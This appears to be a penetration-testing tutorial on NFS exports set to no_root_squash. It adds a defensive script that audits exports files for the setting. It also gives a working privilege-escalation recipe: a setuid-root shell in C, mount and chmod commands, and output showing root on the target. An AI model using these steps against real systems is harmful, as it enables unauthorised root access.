# Exploiting NFS Weak Permissions

Network File System (NFS) is a distributed file system protocol that allows clients to access files over a network as if they were local. However, improper configuration and weak permissions can lead to significant security vulnerabilities, allowing for potential privilege escalation.

## Understanding NFS

* NFS allows remote users to access files stored on a server over a network.
* Files can be exported from an NFS server and mounted on client machines, enabling shared access.

## Understanding `root_squash` and `no_root_squash`

The `root_squash` option is used in NFS to prevent root users on client machines from having root privileges on the NFS server. When this option is enabled, any request made by the root user (UID 0) from a client is mapped to the `nobody` user (or another specified user) on the NFS server. This means that even if a root user on the client accesses the NFS share, they will not have elevated privileges, effectively restricting their access to what the `nobody` user can access.

The `no_root_squash` option allows root users on client machines to retain their root privileges when accessing NFS shares. When this option is enabled, root users on the client can access files on the NFS server with full root privileges. This means they can read, write, and modify files as if they were the root user on the NFS server.

## Setting `no_root_squash`

```
dollarboysushil@kali $ nano /etc/exports
...........
...........
/var/nfs/general *(rw,no_root_squash)
...........
...........
```
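
A server-side check for the setting shown above, as an added example that is not part of the original notes: it parses an exports file and reports every path/client pair that carries `no_root_squash`. The function name, the severity labels and the sample file are constructed for illustration, and the parser assumes one export per line with no backslash continuations or quoted paths.

```bash
#!/bin/sh
# Added example: flag NFS exports that disable root squashing.
# Prints "<severity> <path> <client> no_root_squash" for each offending entry.
# Assumption: one export per line, no backslash continuations or quoted paths.
audit_exports() {
  awk '
    /^[ \t]*(#|$)/ { next }                 # skip comments and blank lines
    {
      path = $1
      for (i = 2; i <= NF; i++) {
        client = $i; opts = ""
        if (match($i, /\(.*\)/)) {          # split "client(opt,opt)"
          client = substr($i, 1, RSTART - 1)
          opts   = substr($i, RSTART + 1, RLENGTH - 2)
        }
        # "(opts)" with no host in front applies to every host
        if (client == "") client = "*"
        n = split(opts, o, ",")
        for (j = 1; j <= n; j++) {
          if (o[j] == "no_root_squash") {
            sev = (client == "*") ? "CRITICAL" : "HIGH"
            print sev, path, client, o[j]
          }
        }
      }
    }' "$1"
}

# Constructed sample file (not taken from a real server).
sample=$(mktemp)
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
# /etc/exports (constructed sample)
/var/nfs/general *(rw,no_root_squash)
/srv/share   192.168.1.0/24(rw,sync,root_squash)
/srv/build   10.0.0.5(rw,no_root_squash) 10.0.0.6(ro)
/srv/data    backup01 (rw,no_root_squash)
/home        (rw,sync)
EOF

audit_exports "$sample"
```

The `/srv/data` line shows the stray-space case: `backup01` gets default options while `(rw,no_root_squash)` applies to every host, so it is reported against `*`. Run the function against `/etc/exports` on the NFS server; reported entries should fall back to the default `root_squash` unless a client genuinely needs root access.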

## Listing all accessible mounts

```bash
dollarboysushil@kali $ showmount -e {ip}
```

## Attack scenario

We will create a simple root-owned binary that executes `/bin/bash`:

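```c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
  /* Takes effect only when the file is owned by root and has the setuid bit set. */
  setuid(0);
  setgid(0);
  /* Start a shell with the IDs set above. */
  system("/bin/bash");
  return 0;
}
```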

Then compile the `.c` file:

```
dollarboysushil@kali: gcc exploit.c -o exploit
```

Now, as root on our attacking machine:

```
root@kali:~$ sudo mount -t nfs {target_ip}:/tmp /mnt
root@kali:~$ cp exploit /mnt
root@kali:~$ chmod u+s /mnt/exploit
```

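Here we mount the target's `/tmp` at `/mnt` on our machine and copy the exploit into `/mnt`. Because the export uses `no_root_squash`, the file written by our local root is owned by root on the target as well. Then `chmod u+s` sets the setuid bit on `exploit`.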

Now, on the target machine:

```
user@target $: cd /tmp
user@target:/tmp $: ./exploit
root@target:/tmp #: id
uid=0(root) gid=0(root) groups=0(root),4(adm)
```

We are now root.

